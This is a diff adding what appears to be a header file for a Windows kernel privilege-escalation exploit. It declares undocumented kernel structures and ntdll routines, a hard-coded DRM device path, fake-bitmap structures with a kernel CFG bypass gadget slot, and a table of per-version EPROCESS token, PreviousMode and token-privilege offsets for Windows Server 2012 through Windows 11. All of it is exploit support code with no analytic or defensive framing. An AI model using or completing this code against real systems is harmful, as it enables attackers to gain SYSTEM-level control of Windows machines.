+    ULONG                ModulesCount;
+    SYSTEM_MODULE        Modules[1];
+} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
+{
+    USHORT UniqueProcessId;
+    USHORT CreatorBackTraceIndex;
+    UCHAR ObjectTypeIndex;
+    UCHAR HandleAttributes;
+    USHORT HandleValue;
+    PVOID Object;
+    ULONG GrantedAccess;
+} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION
+{
+    ULONG NumberOfHandles;
+    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
+} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
+
+__inline void* ULongLongToPtr64(const unsigned long long ull)
+{
+    return((void*)(ULONG_PTR)ull);
+}
+
+//
+// Declare some functions from ntdll.dll
+//
+extern "C"
+{
+    NTSTATUS RtlGUIDFromString(PUNICODE_STRING GuidString, GUID* Guid);
+
+    NTSTATUS RtlStringFromGUID(REFGUID Guid, PUNICODE_STRING GuidString);
+
+    NTSTATUS NtImpersonateThread(HANDLE ThreadHandle, HANDLE ThreadToImpersonate, SECURITY_QUALITY_OF_SERVICE* SecurityQualityOfService);
+
+    NTSTATUS NtWriteVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten OPTIONAL);
+}
+
+
+#define DRM_DEVICE_OBJECT L"\\\\?\\root#system#0000#{ffbb6e3f-ccfe-4d84-90d9-421418b03a8e}\\{eec12db6-ad9c-4168-8658-b03daef417fe}&{abd61e00-9350-47e2-a632-4438b90c6641}"
+
+//DEFINE_GUIDSTRUCT("3C0D501A-140B-11D1-B40F-00A0C9223196", KSNAME_Server);
+//#define KSNAME_Server DEFINE_GUIDNAMED(KSNAME_Server)
+
+//DEFINE_GUIDSTRUCT("3C0D501B-140B-11D1-B40F-00A0C9223196", KSPROPSETID_Service);
+//#define KSPROPSETID_Service DEFINE_GUIDNAMED(KSPROPSETID_Service)
+
+//
+// Declare data structures related to the exploit
+//
+typedef struct _RTL_BITMAP
+{
+    DWORD SizeOfBitMap;
+    PVOID Buffer;
+}RTL_BITMAP, * PRTL_BITMAP;
+
+#pragma pack(1)
+typedef struct _EXPLOIT_DATA1
+{
+    PRTL_BITMAP  FakeBitmap;
+}EXPLOIT_DATA1;
+
+typedef struct _EXPLOIT_DATA2
+{
+    char pad[0x20];
+    PVOID ptr_ArbitraryFunCall; // kCFG bypass gadget function, for example RtlSetAllBits
+} EXPLOIT_DATA2;
+
+
+
+//
+// Kernel object offsets for different Windows versions to maintain exploit
+// compatibility
+//
+enum EPROCESS_TOKEN_OFFSETS
+{
+    EPROCESS_TOKEN_WIN_SERVER2012_62_9200 = 0x348,
+    EPROCESS_TOKEN_WIN_10_1507_10240 = 0x358,
+    EPROCESS_TOKEN_WIN_10_1903_18362 = 0x360,
+    EPROCESS_TOKEN_WIN_10_2004_19041 = 0x4b8,
+    EPROCESS_TOKEN_WIN_10_20H2_19042 = 0x4b8,
+    EPROCESS_TOKEN_WIN_11_22H2_22621 = 0x4b8,
+};
+
+enum KTHREAD_PREVIOUS_MODE_OFFSETS
+{
+    PREV_MODE_WIN_SERVER2012_62_9200 = 0x232,
+    PREV_MODE_WIN_10_20H2_19042 = 0x232,
+    PREV_MODE_WIN_11_22H2_22621 = 0x232,
+};
+
+enum TOKEN_PRIVILEGES_OFFSET
+{
+    TOKEN_PRIV_WIN_10_1507_10240 = 0x40,
+    TOKEN_PRIV_WIN_11_22H2_22621 = 0x40,
+    TOKEN_PRIV_WIN_11_23H2_22631 = 0x40,
+};
\ No newline at end of file